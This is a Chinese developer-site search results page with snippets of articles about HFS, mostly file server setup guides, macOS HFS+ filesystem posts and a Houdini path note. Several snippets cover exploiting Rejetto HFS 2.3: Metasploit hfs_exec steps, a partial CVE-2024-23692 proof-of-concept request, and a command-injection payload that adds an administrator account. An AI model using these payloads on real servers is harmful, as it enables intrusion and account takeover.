首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 【详解】Metasploit攻击HFS2.3上的漏洞

    Metasploit攻击HFS2.3上的漏洞前言HFS(HTTP File Server)是一款轻量级的文件共享服务器,因其简单易用而受到许多用户的喜爱。然而,像所有软件一样,HFS也存在安全漏洞。 目标环境HFS 2.3:目标服务器上安装的HFS版本。目标IP地址:假设目标服务器的IP地址为​​192.168.1.100​​。 搜索漏洞模块使用​​search​​命令查找与HFS 2.3相关的漏洞模块:search hfs3. 例如:search hfs这将列出所有与HFS有关的模块。选择并设置漏洞利用模块: 根据搜索结果选择一个合适的模块。 例如,如果有一个名为exploit/windows/http/hfs_exec的模块适用于HFS 2.3,你可以使用以下命令加载该模块:use exploit/windows/http/hfs_exec

    31500编辑于 2025-07-22
  • 外网访问局域网(Http File Server)HFS软件服务器:通过外网访问内网的hfs共享网络文件方法

    HFS 是一种上传文件的软件。 运行即可,非常的方便,本教程讲解如何使用 HFS 以及如何在外网简单轻松的访问内网的 HFS 服务。 下面是详细 的HFS下载安装教程,及以让外网访问的详细实现步骤。一,下载启动 HFS1,下载HFS软件注意下载存放程序的目录不能是临时文件夹,不然电脑重启后容易丢失,他不需要安装,放哪里就在哪里运行。 HFS界面看起来跟普通FTP客户端有点像。2,设置本地共享文件目录在合适的目录中新建一个专门存放 HFS 的文件目录,文件名称自定义即可。 4,外网访问 HFS在外网电脑的浏览器中使用nat123映射设置好的外网域名端口地址,看到HFS文件页面就代表访问成功了!

    2K10编辑于 2025-10-29
  • 来自专栏游戏开发那些事

    【xAsset框架】HFS 轻量级HTTP Server快速入门指南

    我们今天主要来说一下其中的 HFS 轻量级HTTP Server的快速上手指南。 因此为大家提供了一个极简的轻量级HTTP Server服务器 HFS。该软件轻量小巧,绿色免安装,拆箱即用,大小只有2.38MB。该软件界面预览图如下: ? 图1:HFS HttpServer界面示意图 区域1:菜单栏,一些配置等基本操作 区域2:文件预览窗口,你可以在这里查看并添加电脑上的文件、文件夹等。 每次的访问、下载等记录都会出现在日志窗口,方便大家比对查看问题 区域4:状态监视窗口,可以查看目前有哪些IP在访问本服务器、传输速度,下载进度等等 三、如何配置XAsset使用本软件 首先启动本服务器,HFS.exe 然后在Unity里面修改 Manifest 配置文件的DownLoad Url 路径为我们自定义的路径,直接复制HFS中的地址就好。 转换Unity平台,出相应平台的包,比如Android平台。

    1.7K10发布于 2019-08-16
  • 来自专栏信安百科

    CVE-2024-23692|Rejetto HFS 2.x 远程代码执行漏洞(POC)

    0x00 前言 HFS(HTTP File Server)是一个基于HTTP协议的文件服务器软件,允许用户通过浏览器访问和共享计算机上的文件。 HFS的起源可以追溯到2002年,由Rejetto开发并发布。 HFS的主要特点包括界面简洁直观、易于安装和配置、支持虚拟文件系统、支持多种权限设置等。 通过HFS,用户可以轻松地在本地网络或互联网上共享文件和文件夹,无需安装额外的软件,只需使用一个支持HTTP协议的浏览器即可访问和下载文件。 0x02 CVE编号 CVE-2024-23692 0x03 影响版本 Rejetto HFS 2.x 0x04 漏洞详情 POC: GET /? signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: HFS_SID

    2.3K20编辑于 2024-06-17
  • 来自专栏csdn-nagiY

    Windows电脑使用HFS低成本搭建个人轻NAS并实现远程访问

    /hfs/? 而HFS并不需要安装,双击后就会直接运行程序。HFS的主程序看起来是这样的: 虽然这个软件看起来比较简陋,但功能却很实用。 1.1 设置HFS访客 此时我们本地的HFS没有设置访客权限、没有设置远程文件上传的路径,也没有指定输出端口,因此我们需要先对这些内容进行设定,才能安全的使用HFS。首先是HFS的访客设置。 第二行“协议”我们选择HTTP;第三项“本地地址”就是hfs软件的数据输出端口,由于我们并没有修改hfs的输出端口,因此hfs仍以默认的80端口输出数据(可以在hfs主界面上方点击“端口”按钮,修改输出端口号 ,不止能从hfs下载各类型文件,还能将文件上传到hfs的“上传文件夹”内,实现最低成本打造一个简易版的NAS。

    1K10编辑于 2024-06-16
  • 来自专栏全栈程序员必看

    解决Virtual Box 安装Mac OS X当出现“hfs: summary table not allowed on FS with block size of 2048”问题

    解决Virtual Box 安装Mac OS X当出现“hfs: summary table not allowed on FS with block size of 2048”问题 安装的时候首先出现 hfs: summary table not allowed on FS withblock size of 2048 错误。 然后就是 hfs: could not initializc summary table forOSX Base System 错误。 一開始也不知道是怎么回事。

    43930编辑于 2022-07-06
  • 来自专栏企鹅号快讯

    【Houdini16.5研发】HDK编译geoisosurface.exe

    首先我们要知道编译C++代码的依赖库和头文件在安装路径的什么地方,全局变量$HFS指的是当前的Houdini安装路径,比如C:\Program Files\Side Effects Software\Houdini 16.5.268,这里可以通过Shell来查看$HFS存储了什么? $HFS/custom/houdini/dsolib C++依赖库 $HFS/toolkit/cmake cmake编译 $HFS/toolkit/include C++头文件 $HFS/toolkit /makefiles makefiles编译 $HFS/toolkit/samples 一些代码案例 $HFS/toolkit/slides 文档 下面来按步骤编译下geoisosurface.exe

    1.3K50发布于 2018-02-08
  • 来自专栏HACK学习

    自己的服务器被抓鸡,看我如何反击

    0X00 科普HFS 先来科普一下: HFS是什么? HFS网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe 然后我通过浏览器访问了下该地址,发现是一个HFS的程序 ? ? ? ? ? ? ? ? 然后发现上面全是木马exe,可能是脚本小子用来抓肉鸡用的 我记得没错的话。 HFS2.3.X有个远程代码执行的漏洞 Payload: http://127.0.0.1/? search==%00{.exec|cmd /c net localgroup Administrators DEF /add.} 0X02 反击 HFS2.3.X代码执行的利用工具,我从网上下载了一个

    2K11发布于 2020-03-12
  • 来自专栏工具软件

    Disk Drill for Mac(数据恢复软件) v5.0.1039中文激活版

    Enterprise for mac是Mac OS平台上一款数据恢复软件,能够恢复你不小心删除的重要文件,Disk Drill 具备多种功能,可以帮您恢复丢失的分区,找回您的数据,万能分区搜索、扫描丢失的 HFS + 分区和重建 HFS+ 对话文件。 Disk Drill可以扫描的系统包括:HFSHFS +FAT / FAT32 / exFATNTFSEXT3 / EXT4我们可以恢复的文件类型列表同样全面。 可以提高您的数据恢复:备份到DMG映像 - 将整个硬盘驱动器或分区从故障驱动器备份到新驱动器作为DMG文件将卷重新安装为只读 - 在扫描期间保护非系统卷,以便您的数据不会被OSX或其他应用程序覆盖通用分区搜索 - 恢复HFS +,FAT和NTFS卷上的分区,并为找到的任何一个创建一个虚拟分区扫描丢失的HFS +分区 - 在Mac上查找和重建已重新格式化的HFS +分区重建HFS +目录文件 - 重新构建无法正确安装的HFS

    1.8K60编辑于 2022-10-18
  • 来自专栏雨过天晴

    原 荐 MAC 读写NTFS硬盘

    前两天买了一块1T的硬盘,最近又换了MAC但同时家里电脑又是WIN,可愁坏了用哪种文件系统(HFS+,NTFS)。 最后查了很多资料,最后决定采用四个分区用NTFS,一个分区用HFS+(苹果日志类型)用于Time Machine。 然后在MAC上启用NTFS读写,默认只能读无法写。 3、分区方案 WIN_OS NTFS 100G Tools NTFS 200G Images NTFS 200G Dev NTFS 100G Pel NTFS 100G Backups HFS+ * 保存分区 4、重新格式化 Backups HFS+ 将磁盘重新连接到MAC上,打开磁盘工具,此时,Backups HFS+ 并没有格式化,点击 抹掉 ,重新格式化,选则苹果日志型。 Microsoft Basic Data Personal 107.4 GB disk2s7 8: Apple_HFS

    1.5K30发布于 2018-06-04
  • 来自专栏腾讯技术工程官方号的专栏

    以小窥大:IO 卡顿探寻苹果文件系统

    对比 HFS+ 我们在同一台电脑上构造了两个不同的磁盘分区:APFS 和 HFS+,分别在各自分区下的同一路径下写入了相同数据的10万个文件,接着开始跑同样的测试程序,又发现了更出人意料的结论: HFS /HFS+ Filesystem */ #if HFS  { &hfs_vfsops, "hfs", 17, 0, (MNT_LOCAL | MNT_DOVOLFS), hfs_mountroot, NULL HFS+ HFS+(Hierarchical File System Plus) 是 Mac OS 8.1(1998年) 开始引入的文件系统,同时也是 iOS 10.3 以前默认的文件系统。 HFS+ 能更好的利用磁盘空间,使用 unicode 存储文件编码,提供了更多当时来说更现代的文件系统支持。HFS+ 使用了 Catalog File 来存储目录结构。 APFS APFS(Apple File System) 是苹果推出的最新文件系统,它是 HFS+ 的接任者,解决了 HFS+ 在更现代的文件系统上所缺失的能力。

    1.4K10编辑于 2022-08-26
  • 来自专栏landv

    磁盘修改AF

    选择苹果Mac系统镜像 (cdr格式的) 3 直接选择要写入的盘,不要点击右边的方框中的勾选 (此时就可以写入了,虽然最后还是显示 Change partition type to AF: not a HFS partition Load boot1h: not a HFS partition Load startupfile: not a HFS partition All done, have fun

    2.3K40发布于 2018-05-24
  • 来自专栏康怀帅的专栏

    Mac OS X 背后的故事(下)

    HFS+:更现代的 HFS   作为 Mac OS X 的老祖宗 NeXTSTEP,因为基于 BSD,所以自然也使用 UFS。而老版的 Mac OS 则使用一个叫做 HFS 的文件系统。 由于 HFS+ 是对 HFS 的扩展,故 HFS+ 支持 Mac OS 至 Mac OS X 的平滑过渡,所以 Mac OS X 一直默认使用 HFS+。 但 HFS+ 立足于 HFS 设计,HFS 已有 27 年的历史,HFS+ 亦有 14 年历史。这个文件系统有太多的历史包袱,为考虑兼容性,这些陈旧的设计并不能被推翻重来。    正是由于上述这些原因,连我们介绍过的短视的 Linus Torvalds 都认为 HFS+ 是个垃圾文件系统。苹果自然受不了这种侮辱,因此,干掉 HFS+ 势在必行。用什么取代 HFS+ 呢? 由于各种缺点,干掉 HFS+ 势在必行,然而用什么取代 HFS+ 呢?

    2.9K81发布于 2018-02-28
  • 来自专栏用户1998800的专栏

    创建 macOS 10.15 Catalina 可引导安装镜像

    nobrowse -mountpoint /Volumes/install_esd hdiutil create -o NewBaseSystem -size 8500m -layout SPUD -fs HFS NewBaseSystem.dmg BaseSystem.dmg 构建最终镜像 hdiutil create -o macOS_10.15_Catalina -size 9800m -layout SPUD -fs HFS

    1.3K10编辑于 2023-07-24
  • 来自专栏腾讯安全

    腾讯安全:上万台MSSQL服务器沦为门罗币矿机

    1.png 据腾讯安全专家介绍,该黑产团伙对MSSQL服务器进行爆破成功后,会下载执行HFS服务器上的恶意文件。 从挖矿木马的HFS服务器计数估计,已有上万台MSSQL服务器被植入挖矿木马,另有数十台服务器被安装后门。挖矿木马HFS文件列表如下。

    2K21发布于 2020-07-31
  • 来自专栏python3

    Python 查看服务器磁盘信息

    psutil.disk_partitions() >>> psutil.disk_partitions() [sdiskpart(device='/dev/disk1', mountpoint='/', fstype='hfs dovolfs,journaled,multilabel'), sdiskpart(device='/dev/disk12s2', mountpoint='/Volumes/QQ', fstype='hfs

    4.4K10发布于 2020-01-11
  • 来自专栏freesan44

    加载RAM磁盘编译Xcode项目

    初始化磁盘: C代码 收藏代码 newfs_hfs -v DerivedData /dev/rdiskN 有以下输出: Initialized /dev/rdisk3 as a 2 GB case-insensitive HFS Plus volume 安装磁盘: C代码 收藏代码 diskutil mount -mountPoint ~/Library/Developer/Xcode/DerivedData /dev http://815222418.iteye.com/javascripts/syntaxhighlighter/clipboard_new.swf" flashvars="clipboard=newfs_hfs www.macromedia.com/go/getflashplayer" height="15" width="14"> [ 收藏代码 ](javascript:void() "收藏这段代码") newfs_hfs -v DerivedData /dev/rdiskN 有以下输出: Initialized /dev/rdisk3 as a 2 GB case-insensitive HFS Plus volume

    2K20发布于 2018-09-05
  • 来自专栏前端皮小蛋

    [第37期] 了解下git文件名大小写

    various workarounds to enable Git to work better on filesystems that are not case sensitive, like APFS, HFS 比如APFS,HFS +,FAT,NTFS等。

    98630发布于 2020-02-29
  • 来自专栏奕空

    filebeat合并多行日志示例

    data paths, mounts [[/ (/dev/disk1)]], net usable_space [34.5gb], net total_space [118.9gb], types [hfs paths, mounts [[/ 时间戳A-1 (/dev/disk1)]], net usable_space [34.5gb], net total_space [118.9gb], types [hfs paths, mounts [[/ 时间戳B-1 (/dev/disk1)]], net usable_space [34.5gb], net total_space [118.9gb], types [hfs paths, mounts [[/ 时间戳C-1 (/dev/disk1)]], net usable_space [34.5gb], net total_space [118.9gb], types [hfs

    5.4K51发布于 2019-05-14
  • 来自专栏全栈程序员必看

    启动磁盘不能被分区或恢复成单个分区 mac_mac如何恢复成单个分区

    SIZE IDENTIFIER 0: GUID_partition_scheme *251.0 GB disk0 1: EFI EFI 209.7 MB disk0s1 2: Apple_HFS Microsoft Basic Data OSXRESERVED 8.0 GB disk0s4 5: Microsoft Reserved 16.8 MB disk0s5 6: Apple_HFS

    2K20编辑于 2022-09-22
领券